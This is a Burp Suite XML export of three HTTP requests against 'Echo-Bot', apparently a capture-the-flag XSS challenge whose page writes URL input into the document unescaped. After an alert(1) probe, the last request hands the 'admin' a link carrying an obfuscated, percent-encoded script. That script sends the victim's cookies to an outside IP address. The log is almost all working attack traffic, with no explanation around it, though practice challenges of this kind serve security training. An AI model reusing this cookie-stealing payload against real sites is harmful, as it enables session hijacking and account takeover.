<?xml version="1.1"?>
<!-- NOTE: Any NULL bytes in requests and responses are preserved within this output, even though this strictly breaks the XML syntax. If your XML parser rejects the NULL bytes then you will need to remove or replace these bytes before parsing. Alternatively, you can use the option to base64-encode requests and responses. -->
<!DOCTYPE items [
<!ELEMENT items (item*)>
<!ATTLIST items burpVersion CDATA "">
<!ATTLIST items exportTime CDATA "">
<!ELEMENT item (time, url, host, port, protocol, method, path, extension, request, status, responselength, mimetype, response, comment)>
<!ELEMENT time (#PCDATA)>
<!ELEMENT url (#PCDATA)>
<!ELEMENT host (#PCDATA)>
<!ATTLIST host ip CDATA "">
<!ELEMENT port (#PCDATA)>
<!ELEMENT protocol (#PCDATA)>
<!ELEMENT method (#PCDATA)>
<!ELEMENT path (#PCDATA)>
<!ELEMENT extension (#PCDATA)>
<!ELEMENT request (#PCDATA)>
<!ATTLIST request base64 (true|false) "false">
<!ELEMENT status (#PCDATA)>
<!ELEMENT responselength (#PCDATA)>
<!ELEMENT mimetype (#PCDATA)>
<!ELEMENT response (#PCDATA)>
<!ATTLIST response base64 (true|false) "false">
<!ELEMENT comment (#PCDATA)>
]>
<items burpVersion="1.7.35" exportTime="Thu Dec 13 17:54:17 CST 2018">
  <item>
    <time>Thu Dec 13 17:53:09 CST 2018</time>
    <url><![CDATA[http://120.114.62.45:31338/]]></url>
    <host ip="120.114.62.45">120.114.62.45</host>
    <port>31338</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/]]></path>
    <extension>null</extension>
    <request base64="false"><![CDATA[GET / HTTP/1.1
Host: 120.114.62.45:31338
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

]]></request>
    <status>200</status>
    <responselength>947</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 13 Dec 2018 09:51:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 780

<html>
<body>
<h1>Echo-Bot v0.008</h1><br><br><br><br>
<form action="index.php" method="get">
    Say something...<br>
    <input type="text" size="40" name="echo">
    <input type="submit" value="submit">
</form>
<script>
    if(document.location.href.indexOf("echo=") !== -1) {
        var string = document.location.href.substring(document.location.href.indexOf("echo=")+5);
        document.write("<h4>Echo here</h4><p>"+decodeURIComponent(string)+"</p>");
    }
</script>
<br><br><br><br><br>
<h3>
<h3>Send your payload to admin here (admin will click your link):</h3>
<form action="send.php" method="POST">
    <input type="text" name="report" size="40" placeholder="http://120.114.62.45:31338/index.php?"><br>
    <input type="submit" value="sent">
</form>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 17:53:18 CST 2018</time>
    <url><![CDATA[http://120.114.62.45:31338/index.php?echo=%3Cscript%3Ealert%281%29%3C%2Fscript%3E]]></url>
    <host ip="120.114.62.45">120.114.62.45</host>
    <port>31338</port>
    <protocol>http</protocol>
    <method><![CDATA[GET]]></method>
    <path><![CDATA[/index.php?echo=%3Cscript%3Ealert%281%29%3C%2Fscript%3E]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[GET /index.php?echo=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1
Host: 120.114.62.45:31338
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://120.114.62.45:31338/
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

]]></request>
    <status>200</status>
    <responselength>947</responselength>
    <mimetype>HTML</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 13 Dec 2018 09:51:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 780

<html>
<body>
<h1>Echo-Bot v0.008</h1><br><br><br><br>
<form action="index.php" method="get">
    Say something...<br>
    <input type="text" size="40" name="echo">
    <input type="submit" value="submit">
</form>
<script>
    if(document.location.href.indexOf("echo=") !== -1) {
        var string = document.location.href.substring(document.location.href.indexOf("echo=")+5);
        document.write("<h4>Echo here</h4><p>"+decodeURIComponent(string)+"</p>");
    }
</script>
<br><br><br><br><br>
<h3>
<h3>Send your payload to admin here (admin will click your link):</h3>
<form action="send.php" method="POST">
    <input type="text" name="report" size="40" placeholder="http://120.114.62.45:31338/index.php?"><br>
    <input type="submit" value="sent">
</form>
</body>
</html>
]]></response>
    <comment></comment>
  </item>
  <item>
    <time>Thu Dec 13 17:53:34 CST 2018</time>
    <url><![CDATA[http://120.114.62.45:31338/send.php]]></url>
    <host ip="120.114.62.45">120.114.62.45</host>
    <port>31338</port>
    <protocol>http</protocol>
    <method><![CDATA[POST]]></method>
    <path><![CDATA[/send.php]]></path>
    <extension>php</extension>
    <request base64="false"><![CDATA[POST /send.php HTTP/1.1
Host: 120.114.62.45:31338
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://120.114.62.45:31338/index.php?echo=%3c%73%63%72%69%70%74%3e%76%61%72%20%78%68%74%74%70%20%3d%20%6e%65%77%20%58%4d%4c%48%74%74%70%52%65%71%75%65%73%74%28%29%3b%78%68%74%74%70%2e%6f%70%65%6e%28%22%47%45%54%22%2c%20%22%68%74%74%70%3a%2f%2f%31%30%34%2e%31%39%39%2e%31%37%39%2e%36%36%3a%35%34%33%32%31%2f%22%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%29%3b%78%68%74%74%70%2e%73%65%6e%64%28%29%3b%3c%2f%73%63%72%69%70%74%3e
Content-Type: application/x-www-form-urlencoded
Content-Length: 708
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

report=http%3A%2F%2F120.114.62.45%3A31338%2Findex.php%3Fecho%3D%253c%2573%2563%2572%2569%2570%2574%253e%2576%2561%2572%2520%2578%2568%2574%2574%2570%2520%253d%2520%256e%2565%2577%2520%2558%254d%254c%2548%2574%2574%2570%2552%2565%2571%2575%2565%2573%2574%2528%2529%253b%2578%2568%2574%2574%2570%252e%256f%2570%2565%256e%2528%2522%2547%2545%2554%2522%252c%2520%2522%2568%2574%2574%2570%253a%252f%252f%2531%2530%2534%252e%2531%2539%2539%252e%2531%2537%2539%252e%2536%2536%253a%2535%2534%2533%2532%2531%252f%2522%252b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%256f%256f%256b%2569%2565%2529%253b%2578%2568%2574%2574%2570%252e%2573%2565%256e%2564%2528%2529%253b%253c%252f%2573%2563%2572%2569%2570%2574%253e]]></request>
    <status>200</status>
    <responselength>186</responselength>
    <mimetype>text</mimetype>
    <response base64="false"><![CDATA[HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 13 Dec 2018 09:52:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 20

Do you see the flag?]]></response>
    <comment></comment>
  </item>
</items>
